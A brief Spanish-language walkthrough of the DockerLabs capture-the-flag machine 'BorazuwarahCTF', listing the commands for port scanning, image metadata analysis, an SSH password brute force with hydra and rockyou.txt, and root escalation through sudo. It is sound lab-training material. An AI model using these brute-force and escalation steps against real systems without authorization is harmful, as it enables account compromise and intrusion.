Máquina: BorazuwarahCTF
SO: Linux
Nivel: Muy Facil
DockerLabs


img

1. Aqui tenemos los puertos escaneados de la maquina.

sudo nmap -p- -sS -T5 --min-rate=5000 -sCV -n -Pn 172.17.0.2

img

2. En la web tenemos una imagen.

http://172.17.0.2

img

3. Descargo la imagen de la web para analizar sus metadatos.

wget http://172.17.0.2/imagen.jpeg -q

exiftool imagen.jpeg

img

4. Toca hacer fuerza bruta a la contraseña de borazuwarah por ssh.

hydra -l borazuwarah -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2

img

5. Me conecto por ssh con el usuario borazuwarah.

ssh borazuwarah@172.17.0.2

img

6. Escalando privilegios.

6.1- Reviso los permisos sudo del usuario, tengo todos los permisos

sudo -l

img

6.2- Ejecutamos la bash como sudo

sudo /bin/bash

img


Finalizado.